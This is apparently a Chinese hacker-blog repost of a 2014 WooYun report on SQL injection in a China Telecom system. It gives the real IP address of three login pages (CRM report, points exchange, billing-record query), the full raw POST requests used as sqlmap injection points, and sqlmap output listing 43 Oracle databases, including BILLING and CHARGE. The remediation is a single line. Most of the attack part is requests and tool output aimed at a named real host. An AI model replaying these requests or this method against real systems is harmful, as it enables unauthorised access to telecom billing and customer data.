记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国电信某处系统SQL注入集合

2014-10-16 19:11

http://202.98.116.80/crmrpt/login.aspx

QQ截图20140830215004.png



然后果断用sqlmap跑

post请求

POST /crmrpt/login.aspx HTTP/1.1

Host: 202.98.116.80

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://202.98.116.80/crmrpt/login.aspx

Cookie: ASP.NET_SessionId=4pr1isiz3fb2m03wbvz3ox25

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 132



__VIEWSTATE=dDwtNjAwMjg5NTQzOzs%2Bw%2BWZccNnWuUBcDGfRVXIbvr5SKA%3D&TextBoxPass=admin&TextBoxUsr=admin&ButtonLogin=%E7%99%BB%E5%BD%95





available databases [43]:

[*] APEX_030200

[*] APPQOSSYS

[*] BILLING

[*] BUSINESS_SIGN

[*] CHARGE

[*] CTXSYS

[*] CYP

[*] DATA

[*] DBSNMP

[*] DEBITPAY

[*] DQRPT

[*] EXCSCORE

[*] EXFSYS

[*] FILE

[*] FLOWS_FILES

[*] INTF_HAOBAI

[*] INTF_NET

[*] INTF_NET_QRY

[*] LANBIN

[*] LOCALRPT

[*] LOG

[*] MARKET

[*] MDSYS

[*] NETSMS

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] RPAY

[*] SCOTT

[*] SMSRPT

[*] SYN

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TZY

[*] WATERKING

[*] WD

[*] WMSYS

[*] XDB

[*] ZYADJ

[*] ZYSMS



QQ截图20140830215316.png







漏洞证明:

估计是OA网或是97网的,不然怎么没过滤

http://202.98.116.80/jifen/login.aspx 积分兑换系统

POST请求

POST /jifen/login.aspx HTTP/1.1

Host: 202.98.116.80

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://202.98.116.80/jifen/login.aspx

Cookie: ASP.NET_SessionId=4pr1isiz3fb2m03wbvz3ox25

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 137



__VIEWSTATE=dDwtMzc1MTI5NDQ5Ozs%2B9Gax3NXBFtaiGW5D6Zkb0MhNsz4%3D&TextBoxPwd=111111111&TextBoxUsr=111111111&ButtonLogin=%E7%99%BB%E5%BD%95



QQ截图20140830221648.png





http://202.98.116.80/qd/login.aspx 营帐话单查询

post请求

POST /qd/login.aspx HTTP/1.1

Host: 202.98.116.80

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://202.98.116.80/qd/login.aspx

Cookie: ASP.NET_SessionId=4pr1isiz3fb2m03wbvz3ox25

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 134



__VIEWSTATE=dDwtMTUyMTI0NTcxMTs7PsbU0cV6c7TeZDHUxCOtWnV4AZ%2Bu&TextBoxPwd=0000000000&TextBoxStaff=000000000&Button1=%E7%99%BB%E5%BD%95



QQ截图20140830222311.png

修复方案:

过滤吧 这个OA网的外网也能访问的话得做好安全措施

知识来源: www.wooyun.org/bugs/wooyun-2014-074484

阅读:68724 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“中国电信某处系统SQL注入集合”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云